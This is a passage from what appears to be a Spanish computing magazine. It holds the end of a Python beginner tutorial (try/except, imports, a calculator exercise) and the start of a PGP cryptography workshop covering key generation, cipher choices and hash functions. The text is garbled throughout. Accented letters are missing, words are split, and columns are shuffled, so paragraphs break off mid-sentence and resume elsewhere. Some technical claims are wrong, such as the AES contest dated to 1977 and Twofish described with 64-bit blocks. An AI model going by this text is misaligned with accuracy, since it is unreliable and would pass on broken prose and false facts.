usara el for-in para asignar e incrementar a la variable i. Difcil? Espero que no, aunque la dialctica no es lo mio Bueno, slo nos queda una estructura por tratar. En un principio pens en no incluirla ya que os podra confundir un poco pero bueno, estis para aprender, as que:

try ... except

Esta estructura se utiliza para la condiciones de error. Estoy loco? No, veamos... Es como un if slo que no se le indica una condicin para que se ejecute, sino que python ejecutara el try y no har caso del except a no ser que python de un en la ejecucin de las instrucciones dentro del try. Veamos su sintaxis y luego veremos un par de ejemplos: try: instruccin instruccin ..... except: instruccin instruccin .... [continua el programa] En nuestro google.py: try: conn = httplib.HTTPConnection(URL) conn.request ("GET", COD_BUSQUEDA + formateaQuery(query)) r = conn.getresponse() except: print 'No se ha podido efectuar la conexin' return -1 El programa intentara crear una conexin a Google y si fa lla entonces se ejecuta el except avisndonos de ello. Un ejemplo sencillo, y sin sockets que los veremos en otro

Hace lo mismo pero podis ver que el programa ya no de clara i=0 antes ya que el for-in declara la i y le asigna si

articulo (tiempo al tiempo). Volvamos a nuestro programa de divisin (versin if-else sin elif). Tenamos:

12/68

Taller de Python "Episodio 1"

a=int(raw_input('Dame un numero a dividir:')) b=int(raw_input('Dame el divisor:')) if b!=0: print a/b else: print 'La divisin por cero no esta permitida' Con try y except quedara as: a=int(raw_input('Dame un numero a dividir:')) b=int(raw_input('Dame el divisor:')) try: print a/b except: print 'La divisin por cero no esta permitida' La salida de este programa, que hace la raz cuadrada de 9, seria 3.0 (con decimales porque la funcin sqrt transfor ma el dato a flotante si no lo era). La segunda forma sirve para importar todas las funciones disponibles en el modulo en cuestin. Se usa cuando sabes que vas a usar muchas funciones del modulo y es extre madamente largo definirlas todas una a una con el primer mtodo, o cuando sabes que vas a usar funciones pero no sabes cuantas y as te ahorras tener que modificar el pro grama una y otra vez aadiendo funciones al import. La tercera forma es similar a la segunda con una pequea diferencia. En vez de importar todas las funciones presen tes en el modulo, lo que hace es (al menos eso creo por que no lo he encontrado en ningn sitio) crear una especie de PATH de bsqueda de forma que si llamas a una funcin que no esta por defecto en python, este la busca en las li breras que hayas importado, aunque hay que especificr selo as: Si hacemos import math para usar la funcin sqrt() tendremos que usarla as math.sqrt() Como veis, esta forma difiere un poco de las otras dos en la forma de utilizacin. Cual usar? Pues la que queris siempre que os sintis cmodos. Evidentemente si slo vais a usar una funcin externa, el primer mtodo es el idneo, pero si vais a usar varias, depender de que mto do os guste ms. Yo suelo usar el segundo y el tercero segn mi experiencia y comodidad. Vosotros mismos Como hacer una relacin de mdulos y funciones seria de masiado largo... no lo haremos. No obstante en la ayuda de Python, bajo el epgrafe Library Reference, encontrareis los mdulos principales y las funciones que contiene cada uno. Adems os invito a preguntarme en el foro cualquier duda que tengis. Y con esto y un bizcocho, hasta el prximo articulo a las ocho Y como colofn os voy a poner un ejercicio para que prac tiquis y veis que os da error y que no, etc, etc... Tambin os invito a que me preguntis las dudas que ten gis acerca del ejercicio, y del resto del articulo, y si no me estropea los artculos posteriores (que si no pierdo be neficios ) os contestare gustoso. Ejercicio: Hay una mxima que dice: Los programadores estn en conflicto constante con el Universo. Los programadores intentando crear mayores y mejores programas a prueba de idiotas y el Universo creando mayores y mejores idiotas.

Cuando debemos usar try-except? Cuando sepamos que python puede darnos un error y as ahorrarnos una condicin que puede ser difcil de escribir, adems de inne cesaria. En este caso, si sabemos que python da error cuando se divide por cero, porque usar un if para compro bar si el divisor es cero? Nosotros los intentamos igual con el try y si resulta que hemos introducido un cero como di visor y python se queja, entonces se ejecutara el except y en vez de fallar el programa, se ejecutara lo que haya den tro del except, en este caso el print avisndonos de que estamos dividiendo por cero. Copiado y archivado? Eso espero Y hemos llegado al ultimo punto de este Quick & Dirty Python Article n1

Python posee mltiples mdulos importables con funciones que nos facilitan la tarea de programar. Hemos visto algu nas que vienen por defecto como int(), str(), range(),... pero muchas otras tienen que ser importadas para ser usadas, como por ejemplo la funcin de raz cuadrada sqrt() Esta funcin esta presente en el modulo math que es una librera de funciones matemticas. Otras funciones que po see son por ejemplo: seno, coseno, tangente, etc... Hay tres formas de importar funciones en python: 1. from modulo import funcin 2. from modulo import * 3. import modulo La primera forma sirve para importar una funcin concreta de un modulo. Veamos un programa que hace raz cuadra da: from math import sqrt print sqrt(9)

13/68

Taller de Python "Episodio 1"

Mi antiguo profesor me deca: "Un programa slo es un buen programa si su numero de errores tiende a ce ro. De aqu deducimos que Microsoft no hace buenos programas..." Dejando de lado la evidente fobia que tenia mi profesor hacia la empresa americana que todos conocemos y ama mos / odiamos, tenia razn. Nunca podis saber quien va a acabar usando un programa escrito por vosotros. Aunque lo escribis para uso propio, alguna vez se lo dejareis a un amigo, y ah se acabo el uso propio. De ah a verlo en la mula o en una web del estilo de Softonic o similar hay un paso.

ejercicio.py

#!/usr/bin/env python import math opcin=0 while opcin!=6: print 'Calculadora de prueba v1.0 (by Moleman)\n' print '1. Sumar' print '2. Restar' print '3. Multiplicar' print '4. Divisin entera' print '5. Raz cuadrada' print '6. Salir' opcin=int(raw_input('Escoge el numero de opcin: ')) if opcin==1: a=int(raw_input('\nPrimer numero: ')) b=int(raw_input('\nSegundo numero: ')) print '\nResultado:',a+b,'\n\n' elif opcin==2: a=int(raw_input('\nPrimer numero: ')) b=int(raw_input('\nSegundo numero: ')) print '\nResultado:',a-b,'\n\n' elif opcin==3: a=int(raw_input('\nPrimer numero: ')) b=int(raw_input('\nSegundo numero: ')) print '\nResultado:',a*b,'\n\n' elif opcin==4: a=int(raw_input('\nPrimer numero: ')) b=int(raw_input('\nSegundo numero: ')) print '\nResultado:',a/b,'\n\n' elif opcin==5: a=int(raw_input('\nNumero: ')) print '\nResultado:',math.sqrt(a),'\n\n' elif opcin==6: print '\nGracias por volar con aerolneas Moleman... estooo, por usar la Calculadora v1.0\n\n' else: print '\nOpcion incorrecta. Vuelve a probar...\n\n'

Bien, el ejercicio consiste en coger el programa que os voy a poner y modificarlo para evitar que falle de ninguna ma nera, ya sea por introducir datos invlidos o por cualquier otra razn. Y as adems practicareis todo lo visto. Mejoradlo todo lo que podis. El programa funciona perfec tamente pero se puede conseguir que falle muy fcilmen te. Para los ms observadores, si, lo reconozco. Es una calculadora! Pero bueno, tarde o temprano tenia que apa recer verdad? Adems slo es un ejercicio para practicar y si contis con el google.py creo que podrais disculpar me, no? Pues eso es todo. Espero que hayis disfrutado con el arti culo y que continuis. En la siguiente revista ms. PD: se me olvidaba. Los comentarios en el cdigo se po nen as #esto es un comentario con el smbolo almohadilla " # " delante. Saludos...

Agradecimientos a HpN, HxC y a mi mujer por soportarme continuamente (va por ti Marta)

14/68

TALLER DE CRIPTOGRAFA - El sistema PGP

Bienvenidos al Taller de Criptografa. Si habis seguido la revista de forma regular, recordaris sin duda artculos como el de envenenamiento de cach ARP de moebius, el de sniffers del nmero anterior y muchos otros que, de una u otra forma, nos han recordado lo precaria que es la seguridad de nuestros datos, especialmente en el mbito de redes locales: cualquiera con unos mnimos conocimientos tcnicos y un poco de paciencia puede leer nuestros correos como si tal cosa, robar contraseas... Por supuesto, todo esto puede evitarse con un diseo de red (tanto de poltica como de componentes fsicos y su diseo lgico) adecuado... pero siempre depende de otros (a no ser que seamos el administrador de esa red, claro) y hoy en da acce demos a muchos datos sensibles a travs de Internet y esas conexiones se realizan desde mu chos sitios, no solamente desde nuestra casa. Qu podemos hacer como simples usuarios desde nuestro terminal? Por supuesto, echar mano de la criptografa. Qu es lo que hace de la criptografa un mtodo de proteccin de nuestra informacin tan bue no? Aunque la respuesta a esta pregunta tan sencilla es muy compleja... pero podemos extraer una primera idea muy importante: la criptografa se sirve de la infraestructura lgica y fsica que los ordenadores nos brindan para proteger la informacin en s. Otros mtodos (IDS, Firewalls, diseos de red...) se basan en modificar de una u otra forma esa misma infraestruc tura, pero dejando la informacin inalterada. El principal problema de esta segunda opcin es que resulta tcnicamente ms costosa, y que una vez encontremos una debilidad en estos sis temas de proteccin, la informacin estar igual de expuesta que si no existieran. Al cifrar nues tros datos, estamos usando un mtodo de proteccin de la informacin en s, que es matemti camente muy complejo y poderoso, pero que de cara al usuario es transparente y sencillo de usar. En este Taller de Criptografa iremos viendo poco a poco cmo manejar este poderoso recurso que es la criptografa, y aprenderemos a incorporar sus funcionalidades a nuestras tareas coti dianas con el ordenador. La forma en que aprenderemos todo esto ser eminentemente prctica, donde no faltarn las explicaciones tcnicas, por supuesto, pero intentaremos que stas aparez can cuando sea necesario para la comprensin de nuestras prcticas... y por supuesto, paso a paso.

15/68

TALLER DE CRIPTOGRAFA - El sistema PGP

Un concepto muy importante que genera confusin y que conviene aclarar desde el principio es la diferencia entre codificacin y encriptacin o cifrado. El hecho de codificar una informacin supone transformar esa informacin a una representacin equivalente, de forma que el significado de la informacin en su representacin original y en su representacin transformada sea el mismo. El proceso in verso de la codificacin es la decodificacin y puede reali zarse de forma directa y transparente. Ambos procesos pueden ser descritos mediante algoritmos (que general mente suelen ser pblicos o conocidos) de forma que cual quier persona pueda transformar una informacin en sus distintas representaciones. Entendemos por algoritmo una descripcin precisa de una sucesin de instrucciones que permiten llevar a cabo un trabajo en un nmero finito de pasos. Cuando hablamos de cifrado, nos referimos igualmente a u n a t ra n s f o r m a c i n q u e t i e n e p o r f i n g e n e ra r u n a representacin equivalente de la informacin, pero con una gran diferencia: en el proceso o algoritmo de cifrado inter viene un elemento llamado clave (del que ms adelante hablaremos) y que resulta imprescindible para poder rea lizar el proceso de cifrado, descifrado o ambos. De esta forma, una informacin cifrada no puede ser reconstruida si no se conoce, adems del algoritmo, la clave (o claves) criptogrficas que protegen la informacin. Imaginemos que tenemos un texto escrito en castellano con todos sus caracteres en minscula. Si nosotros decidi mos, en un alarde de creatividad ( ), escribir de nuevo e s e t e x t o p e r o c o n t o d o s s u s c a ra c t e r e s e n l e t ra s maysculas, habramos realizado una codificacin del mis mo en maysculas. Cualquier persona que conozca el alfa beto, aunque fuera incapaz de entender lo que dice, sera capaz de decodificarla de nuevo a minsculas. Ahora imaginemos que ese mismo texto lo traducimos a algn otro idioma, por ejemplo a francs. En este caso la transformacin de la informacin la realizamos a travs de un diccionario castellano-francs, que actuara como clave, y obtenemos un texto cifrado en francs. Si alguien quisie ra recuperar la informacin original en castellano, necesi tara un diccionario francs-castellano para descifrar la informacin. Ya, ya s que si hablas francs y castellano no necesitas diccionario, se trata nicamente de un ejemplo para que entendamos de forma intuitiva la diferencia entre codificar y cifrar. Cuando hablamos de criptosistemas informticos, nos referi mos al texto original (el texto legible) como texto en claro. El texto una vez cifrado se denomina criptograma. El proceso para convertir texto en claro a criptograma es lo que conocemos como cifrado o encriptacin, y el proce so que convierte criptogramas en textos en claro lo llama mos descifrado o desencriptacin.

Echemos la vista atrs, concretamente al ao 1991 en Estados Unidos. El boom informtico estaba en pleno apogeo, los nuevos y potentes (por aquel entonces, claro) 80486DX de 32 bits y con cach de nivel 1 incorporada lle varon a los ordenadores personales una potencia hasta en tonces desconocida, y posibilitaron que cierto tipo de apli caciones que hasta entonces no haban llegado al mercado domstico lo hicieran. Uno de ellos la criptografa. Cuando los rumores sobre posibles leyes para prohibir la criptografa comenzaban circular, un programador llamado Philip Zimmermann program un software gratuito que mezclaba los mejores algoritmos de cada tipo (ms ade lante hablaremos sobre esto) y permita a cualquiera con un ordenador personal hacer uso de una criptografa muy poderosa, equiparable a la de cualquier gobierno. ste pro grama se llam PGP, acrnimo de Pretty Good Privacy, y hoy en da sigue siendo el referente en su campo. La historia de PGP es muy curiosa, y os animo a leer ms sobre ella... aunque ste no es el sitio. Estoy seguro que google os puede echar una mano. En esta primera parte del taller de criptografa vamos a va lernos de PGP bajo Windows (aunque tambin puede ser seguido desde Macintosh) para aprender a usar y com prender la criptografa. Ms adelante veremos otra implementacin del estndar OpenPGP que es casi tan fa mosa, tiene versiones para casi cualquier sistema operati vo y adems es software libre: GnuPG. OpenPGP es el estndar que surgi a partir de PGP, y que marca las pautas de compatibilidad que permiten a las dis tintas implementaciones ser completamente compatibles. Podis consultar la descripcin de este estndar en el RFC 2440 que podis encontrar en: ftp://ftp.rfc-editor.org/in-notes/rfc2440.txt Lamentablemente no he encontrado ninguna traduccin de este RFC al castellano.

Aunque histricamente desde casi sus inicios han existido dos versiones de PGP (la internacional, centralizada en el sitio http://www.pgpi.org/ y la estadounidense de la PGP Corporation http://www.pgp.com/), hoy en da prctica mente todo el mundo usa la versin PGP estndar. Aunque la PGP Corporation ha crecido muchsimo, siguen fieles a una de sus mximas desde sus inicios: ofrecer una versin gratuita de PGP para uso individual, educacional y en ge neral cualquier actividad sin nimo de lucro. En el momen to de escribir este artculo la ltima versin es la 8.1, que podemos descargar de este enlace: http://www.pgp.com/downloads/freeware/

16/68

TALLER DE CRIPTOGRAFA - El sistema PGP

Otra de las mximas de PGP (que no siempre han mante nido, por cierto, pero por suerte actualmente s est vigen te) es ofrecer el cdigo fuente de PGP para que cualquier persona pueda examinarlo. Si sois los ms paranoicos de vuestro barrio y tenis buenos conocimientos de programacin, podis echar un vistazo al cdigo en el si guiente enlace: http://www.pgp.com/downloads/sourcecode/index.html Si decides bajarte el cdigo fuente de PGP, es MUY impor tante que leas la licencia a la que dicha descarga est su jeta. Una vez bajado, procederemos a instalarlo. Las pantallas que veremos durante la instalacin son las siguientes: 1) Welcome. Pantalla de bienvenida. 2) License Agreement. Debis leer y aceptar (o no, en cuyo caso no podris instalar el software) la EULA de PGP. 3) Read Me. Es conveniente que al menos echis un vistazo al leme del programa. 4) User Type. Esta es la primera pantalla interesante... seleccionaremos la opcin No, I'm a New User y con tinuaremos. 5) Install Directory. Seleccionamos el directorio de instalacin que queremos usar. 6) Select Components. En esta pantalla podremos con figurar los distintos componentes adicionales de PGP que podemos instalar, tales como plugins para software de uso comn, PGPdisk (solamente para versiones re gistradas) y dems. Si queris instalar alguno, podis hacerlo, pero no vamos a utilizarlos, al menos por el momento. 7) Start Copying Files. Veremos un resumen de lo que se va a instalar, y si estamos de acuerdo con todo, pro cedemos a su instalacin. 8) Install Complete. Una vez finalizada la instalacin es ne cesario reiniciar el ordenador para que el software se cargue correctamente. Una vez reiniciado el ordenador, PGP iniciar automticamente el asistente de claves (PGP Key Generation Wizard) mediante el cual crearemos nuestro par de claves nico y personal. Pulsamos en el botn Expert (acaso no nos gusta exprimir todo al mxi mo? ) y estaremos ante el men pormenorizado de generacin de claves. Imaginemos que no disponemos de un diccionario castella no-francs/francs-castellano y que nicamente tenemos uno castellano-francs y otro francs-castellano. Cuando nosotros traduzcamos nuestro texto de castellano a fran cs necesitaremos uno de los diccionarios, y cuando que ramos realizar el proceso inverso necesitaremos el otro. Este sera el concepto de claves de cifrado asimtricas. En un algoritmo criptogrfico asimtrico existen dos claves complementarias, de forma que lo que una cifra puede ser descifrado por la otra y viceversa. A una de ellas le deno minaremos clave pblica o de cifrado, y a la otra clave pri vada o de descifrado. Dado que ambas claves deben ser complementarias, ambas se generan en el mismo momen to y ambas son necesarias para que el criptosistema fun cione. Ms adelante veremos el funcionamiento concreto de las claves asimtricas. Existen muchos algoritmos asimtricos basados en diver sos problemas matemticos, pero PGP nos ofrece dos po sibilidades: DH/DSS (Diffie-Hellman/Digital Standard Signature). Este algoritmo se basa en el problema matemtico del logarit mo discreto del grupo multiplicativo de un campo finito (obvia mente no necesitis sa ber qu demonios sig nifica esto ) y fue i d e a d o p o r D r e s s . W. Diffie y M.E. Hellman en 1976 (podis consultar el documento [DIH76] para ms referencias), aunque no tuvo implementacin com putacional hasta 1985, cuando ElGamal logr demostrar que sta era posible en su documen to [ELG85]. En 1991 el 17/68 Recordemos lo que sabemos sobre claves criptogrficas: son el elemento ms importante de un criptosistema, su alma. Gracias a las claves, un mismo algoritmo de cifrado puede ser usado por multitud de personas sin que el crip tosistema coincida. La clave sera el diccionario que nos permitira pasar de texto en claro a criptograma y vicever sa. En el campo Full Name introducimos nuestro nombre (o nick) y en Email address nuestra direccin de correo electrnico. Hasta aqu todo bien, pero llegamos al campo Key Type y nos encontramos tres opciones: DiffieHellman/DSS, RSA y RSA Legacy. Son los distintos tipos de algoritmos que PGP nos brinda para generacin de cla ves asimtricas... es el momento de hablar de ellas.

TALLER DE CRIPTOGRAFA - El sistema PGP

NIST propuso DSS como ampliacin a DH para convertirlo en un criptosistema completo (DH careca de un sistema de firma... ms adelante hablaremos de las firmas cripto grficas). As naci DH/DSS. RSA (Rivest-Shamir-Adleman). Este algoritmo fue ideado en 1978 por Ron Rivest, Adi Shamir y Leonard Adleman y descrito en el documento [RSA78]. Basa su potencia en el problema matemtico de la factorizacin entera (no, tam poco es necesario entender eso). El algoritmo fue patenta do, pero la patente expir en el ao 2000, por lo que hoy en da puede ser usado libremente. Aunque suene casi a ciencia ficcin, existe un algoritmo para computadores cunticos que ha sido probado y de mostrado por IBM y que permitira reducir enormemente la complejidad del problema de la factorizacin entera. ste algoritmo es conocido como Algoritmo de Shor y aunque facilitara enormemente la ruptura de claves RSA, seguira siendo un problema muy complejo para claves grandes... y requerira un ordenador cuntico bastante po tente. Podis saber ms sobre el algoritmo de Shor en: http://en.wikipedia.org/wiki/Shor's_algorithm Si os estis preguntando porqu he dicho que PGP ofrece dos posibilidades cuando en realidad en nuestro men de generacin de claves podemos elegir tres... pues entonces es que estis bastante atentos . En realidad solamente hay dos posibilidades: DH/DSS y RSA. La tercera opcin (RSA Legacy) es una versin vieja de RSA que solamente se usa para mantener compatibilidad con claves de versio nes antiguas de PGP, pero que a nosotros no va a intere sarnos, puesto que no implementa claves de revocacin, mltiples subclaves y otros aspectos que el RSA actual s soporta. As pues, tenemos que decidir qu algoritmo elegimos. Eso es una decisin que dejo en vuestras manos, aunque s di r que tradicionalmente (y debido a la patente que hasta el ao 2000 atenazaba al algoritmo RSA) se ha usado DH/DSS, y que de hecho es el que ms gente usa... y tam bin dir que yo uso RSA. Pero cada cual que elija el que ms rabia le d, es indiferente para el seguimiento de este taller. En Key size debemos indicar el tamao de la clave que deseamos generar. Cuando ms grande sea nuestra clave, muchsimo ms compleja resultara de romper en un mo mento dado. Tanto RSA como DH soportan claves de hasta 4096 bits, aunque cabe destacar que DSS, el algoritmo de firma de DH, solamente soporta hasta 1024, por lo que so lamente podremos crear claves DH/DSS de como mucho 4096/1024 bits. Mi recomendacin de friki-paranoico es que elijis los 4096 bits. Como curiosidad: la relacin que guarda el tamao de la clave con la complejidad de sta es exponencial, pues da da una clave cualquiera, al aumentar un bit el tamao de la misma, duplicaramos su complejidad. As, una clave de 1025 bits es el doble de compleja que una de 1024. Podis echar las cuentas de cmo de compleja es una clave de 4096 bits... Ahora nos encontramos con el campo Key expiration, donde podremos indicar, si la deseamos, la fecha de cadu cidad de nuestra clave. sto puede resultar til cuando queremos definir claves por un perodo de tiempo, por ejemplo. En nuestro caso no nos interesar, aunque si al guien quiere utilizar esta opcin, no alterar el desarrollo de las prcticas. Por fin, pulsamos siguiente.

Nos encontramos en la pantalla de creacin del passphrase (que es a password lo que frase a palabra). Debemos defi nir la contrasea que proteger las acciones que nuestra clave privada es capaz de realizar. Como bien sabemos, una cadena siempre se rompe por su eslabn ms dbil, por lo que una clave de 4096 bits que caiga en manos in apropiadas y con un passphrase predecible deja todo el criptosistema al descubierto. Mi recomendacin es que usis una contrasea SEGURA. Al menos de 8 10 caracteres de largo, con letras maysculas, minsculas, nmeros y si es posible smbolos. La ma es de 25 caracteres, y cuando te acostumbras no es tan incmodo. Al pulsar siguiente empieza el proceso de generacin de la clave propiamente dicho, tras el cual la clave es completa mente utilizable. El proceso de generacin de la clave tiene un componente aleatorio que viene dado por la entropa que introduce el usuario en el sistema: movimientos del ratn, uso de los perifricos de entrada/salida... esto es as porque los orde nadores NO pueden generar nmeros autnticamente aleatorios (nicamente pseudoaleatorios), lo que hara que una clave generada nicamente por el ordenador pudiera ser predecible.

Antes de meternos en faena, vamos a echar un vistazo a las opciones de PGP pulsando con el botn derecho en el icono PGPtray y seleccionando Options. En la pestaa General vemos en primer lugar las opcio nes estndar, donde si queremos podremos aadir una l nea de comentario a los mensajes o ficheros generados con PGP. En el apartado Single Sign-On tenemos la opcin de guardar en cach los passphrases del usuario, con el fin de evitar tener que estar teclendolos una y otra vez. Por defecto esta opcin est activada. Pues bien, re comiendo ENCARECIDAMENTE desactivar esta opcin, por evidentes motivos de seguridad. El apartado de File Wiping lo dejamos descansar... de momento, porque es MUY interesante y ms adelante hablaremos de l.

18/68

TALLER DE CRIPTOGRAFA - El sistema PGP

En la pestaa Files podemos elegir la localizacin que queremos para nuestro anillo de claves. En los sistemas OpenPGP las claves, subclaves y firmas se organizan en un sistema llamado anillo de claves y que permite la interaccin de unas con otras (identificacin de firmas, revocacin de elementos...) as como el uso simul tneo de las mismas (por ejemplo, cifrar un archivo a var ios destinatarios). La pestaa Email nos permite configurar diversos aspec tos del comportamiento de PGP con los MUAs (Mail User Agents), pero de momento este men no lo tocaremos, pues el tema de PGP y correo electrnico corresponde a otro artculo. En la pestaa HotKeys podemos definir ata jos de teclado para diversas operaciones comunes de PGP... si sois un poco vagos quiz os guste definir unos cuantos atajos, pero yo personalmente no uso ninguno. En la pestaa Servers encontramos los diversos servi dores de claves PGP que el programa usar para sincroni zar las claves, firmas y revocaciones con las de nuestro anillo. De esta forma, cuando recibamos un correo de una clave que no est en nuestro anillo, podremos conectarnos en caliente al servidor y obtener esa clave para verificar la autenticidad del mensaje (siempre y cuando el usuario de esa clave haya subido la misma al servidor, claro... pero de eso hablaremos ms tarde). La pestaa CA corre sponde a la configuracin de las Autoridades de Certificacin... eso no lo tocaremos, pues se escapa bastante del temario de este artculo. Llegamos por fin a la pestaa Advanced, donde ms chicha vamos a encontrar... Tranquilos... tiene su explicacin. En realidad PGP se sirve no de uno ni dos, sino de TRES tipos de cifrado para poder realizar sus distintas funciones. Ms tarde explicaremos el mecanismo concreto que explica este aparente contrasentido, aunque como anticipo dir que en realidad todo lo que cifremos con PGP se har con claves simtricas. Y qu es el cifrado simtrico? Imaginemos el ejemplo de los diccionarios... e imaginad que ahora s existe un diccio nario castellano-francs/francs-castellano. Sera la nica clave necesaria para cifrar y descifrar el texto. As pues, en un criptosistema simtrico, la clave es nica y cumple las funciones de cifrado y descifrado. Los criptosistemas simtricos se dividen a su vez en dos tipos: los de cifrado de bloque, que cifran el texto en claro en unos bloques con tamao prefijado (por ejemplo 32 bits 64 bits); y los de cifrado de flujo, que cifran de forma continuada bit a bit o byte a byte. Las opciones que encontramos son las siguientes: AES (Advanced Encryption Standard), 2000. Tambin conocido como algoritmo Rijndael, es el ganador del concurso que en 1977 convoc el NIST para definir el nuevo estndar de cifrado simtrico (por ello, al ganar pas a llamarse AES). Fue ideado por los belgas Vincent Rijmen y Joan Daemen y puede actuar como algoritmo de cifrado de bloques o de flujo. Soporta claves de hasta 256 bits. CAST (Carlisle Adams - Stafford Tavares), 1997. Existen dos versiones de este algoritmo: la 128 y la 256 (indica el tamao mximo de clave que maneja), y en ambos casos se trata de un algoritmo de cifrado en bloques de 128 bits. El funcionamiento interno de este algoritmo es uno de los ms complejos (y por tan to, computacionalmente ms lentos) de entre los que PGP nos brinda. TripleDES (Triple Data Encryption Standard), 1995. En realidad TripleDES no es un algoritmo en s mismo, sino que resulta de la aplicacin tres veces con distin tas claves del veterano algoritmo DES de 1976 (el an tecesor de AES). Maneja longitudes de clave de hasta 168 bits efectivos (ms 24 de paridad), y aunque no es muy complejo, s es muy rpido en su clculo. IDEA (International Data Encryption Algorithm), 1990. Se trata de un algoritmo de cifrado en bloques de 64 bits ideado por Xuejia Lai y L. Massey que sopo rta claves de longitud de hasta 128 bits. Es importante mencionar que este algoritmo est patentado y la pat ente an es vigente en Estados Unidos as como en Europa (motivo por el cual algunas implementaciones OpenPGP, como por ejemplo GnuPG, no lo implemen tan). Twofish, 1998. Este algoritmo es la evolucin de uno llamado Blowfish, y fue uno de los finalistas del concur 19/68

En primer lugar nos encontramos con el apartado Encryp tion, donde configuraremos las opciones del cifrado simtrico de PGP. Qu? Cmo? Pero no habamos quedado que PGP usaba claves de cifrado asimtricas? T me ests engaando! Po di!

TALLER DE CRIPTOGRAFA - El sistema PGP

so AES del NIST. Twofish es un algoritmo de cifrado en bloques de 64 bits que maneja claves de hasta 256 bits. Este algoritmo destaca por ser el ms rpido en su ejecucin con mucha diferencia, motivo por el cual es bastante usado (por ejemplo en SSH). Conviene tener todos activados (en Allowed algorithms), pero hay que elegir uno preferido... bien, aqu yo reco miendo usar AES, por compatibilidad y por potencia, si bien Twofish me gusta tambin bastante. Las dems opcio nes de esta pantalla podemos dejarlas como vienen per fectamente. La pestaa PGPdisk solamente podr ser configurada si tienes una versin registrada de PGP, por lo que aqu la obviaremos. La fotografa en PGP es opcional y adems no suele usarse demasiado. Se puede aadir mediante el men Keys, Add, Photo. La que he incluido en la clave de ejemplo es un pequeo guio a mis amigos del foro hackxcrack... y ya de paso, os invito a que os pasis por l si no lo habis he cho ya. Os aseguro que aprenderis mucho. http://www.hackxcrack.com/phpBB2/ Analicemos los campos que vemos en este men porque son muy importantes: ID: En el campo ID veremos un nmero hexadecimal (0x...) que identifica a nuestra clave y resulta muy til para realizar consultas al servidor de claves. Aunque es extremadamente complicado (una posibilidad entre ms de cuatro mil millones) es posible que este ID co incida con el de otra clave, por lo que este campo NO sirve para identificar a la clave de forma unvoca, y simplemente lo usaremos como referencia. Type: El tipo de clave asimtrica que elegimos en el momento de la generacin. S i z e : E l t a m a o d e n u e s t ra c l a v e e n f o r m a t o xxxx/yyyy donde xxxx representa la longitud de cifrado e yyyy representa la longitud de la firma. Created: Fecha de creacin de la clave en cuestin. Expires: Fecha de expiracin de la clave. Por defecto, y si no indicasteis explcitamente lo contrario, ser Ne ver. Cipher: Algoritmo preferido de cifrado simtrico. Generalmente ser AES-256. Casilla Enabled: Nos permite, cuando es una clave e x t e r n a ( l l a m a m o s c l ave e x t e r n a a a q u e l l a q u e nicamente tiene componente de clave pblica, care ciendo de la privada), desactivar la misma, bien porque haya caducado, bien porque ya no sea segura, bien porque no deseemos cifrar por equivocacin a esa cla ve... Hay que tener en cuenta que una clave con parte pblica y privada no puede ser desactivada en ningn caso. Botn Change Passphrase: Al pulsar sobre este botn, y previa autentificacin mediante el actual passphrase, es posible cambiar el mismo de la clave. Fingerprint: Este concepto es uno de los ms importan tes en PGP. Como ya dijimos, aunque es complicado, es posible que el KeyID de dos claves distintas coinci da, por lo que necesitamos un mecanismo que permita identificar de forma unvoca a cada una de las claves. Este mecanismo es el fingerprint, tambin denominado huella digital. Antes de continuar, si veis en este campo una serie de palabras, pulsad sobre la casilla Hexade cimal para verla como $DEITY manda.

Ahora que ya tenemos nuestra clave creada y que hemos podido personalizar las opciones de PGP... es el momento de profundizar en la clave. Lo primero que tenemos que hacer es acceder al adminis trador de claves de PGP, lo cual haremos pulsando con el botn derecho en el icono PGPtray y seleccionando la opcin PGPkeys. Al seleccionar y pulsar con el botn dere cho del ratn sobre nuestra clave, veremos el men con textual de la misma. S, s que son muchas cosas... pero de momento solamente pulsaremos en Key Properties para poder entrar en detalle.

20/68

TALLER DE CRIPTOGRAFA - El sistema PGP

Si con el KeyID las posibilidades de coincidencia eran de una entre cuatro mil millones, con el fingerprint, y depen diendo del algoritmo usado, son de una entre cifras del or den del sextilln (1x10^38) o del octilln (1x10^48). Y qu es el fingerprint? Simplemente es el hash de la cla ve pblica... lo cual nos lleva a un poquito ms de teora, en este caso sobre las funciones hash. Para entender qu es una funcin hash, vamos a hacer un poco de memoria... concretamente hasta nuestros tiempos del instituto. Imaginemos una funcin matemtica de las de toda la vida, por ejemplo y=x^2. La y sera la f(x), es decir, el valor dado en funcin de x. Ahora imaginemos que esa funcin es una mquina que transforma un valor de entrada que nosotros le damos en un valor de salida. Por ejemplo, si nosotros metemos en la funcin el valor 2, sta nos devuelve su cuadrado: 4. As ocurrir para cualquier valor de x que nosotros le demos. Ahora imaginemos que construimos una funcin que lla maremos la inversa de la anterior y que ser y=raz(x). Esta funcin f'(x) tambin podemos considerarla una m quina de transformar valores, y se da la propiedad de que si introducimos en nuestra segunda funcin f'(x) el valor de salida de nuestra primera funcin f(x) obtendremos el valor que introducimos en la primera. Por ejemplo, f(2)=4 y f'(4)=2. Hasta ahora bien? Bueno, pues ahora vamos a echarle to dava un poquito ms de imaginacin. Imaginemos que construyo una funcin ms compleja... en la que por el proceso pierda informacin. Por ejemplo, me construyo una funcin en la que elimino el nmero menos significati vo de la entrada y lo que me quede lo elevo al cuadrado. Consideremos esta nueva funcin -que llamar g(x)- de nuevo una mquina de transformar nmeros. Introducimos el valor 23 y la funcin realiza su algoritmo: elimina el 2 y eleva el 3 al cuadrado. La salida de esta funcin sera 9. La cuestin es... sera posible realizar una funcin g'(x) que fuera la inversa de la anterior? NO, porque en el pro ceso de la funcin se pierde una informacin que no puede ser recuperada a posteriori. Esto sera una funcin irrever sible. Un ltimo esfuerzo imaginativo... ahora imaginemos que construyo una funcin irreversible lo suficientemente com pleja como para que devuelva una salida bastante grande, lo suficiente como para que no coincida con facilidad dadas dos entradas distintas. Esto permitira resumir distintas entradas a los valores que produce la funcin a partir de ellas... y esto sera una funcin hash. As pues, toda funcin hash tiene unas propiedades matemticas que vamos a explicar de forma sencilla: Unidireccional: Una funcin hash es irreversible, y dada una salida de la misma, es computacionalmente imposible recomponer la entrada que la gener. Compresin: Dado un tamao cualquiera de entrada para la funcin hash, la salida de la misma ser de una longitud fija. Difusin: La salida de la funcin hash es un resumen complejo de la totalidad de la entrada, es decir, se usan TODOS los bits de la misma. Resistencia a las colisiones simples: Esta propiedad nos indica que dado un valor de entrada de la funcin hash, es computacionalmente imposible encontrar otra entrada que genere el mismo valor de salida. Resistencia a las colisiones fuertes: Esta propiedad nos indica que es computacionalmente muy difcil en contrar dos valores de entrada que generen un mismo valor de salida. En PGP 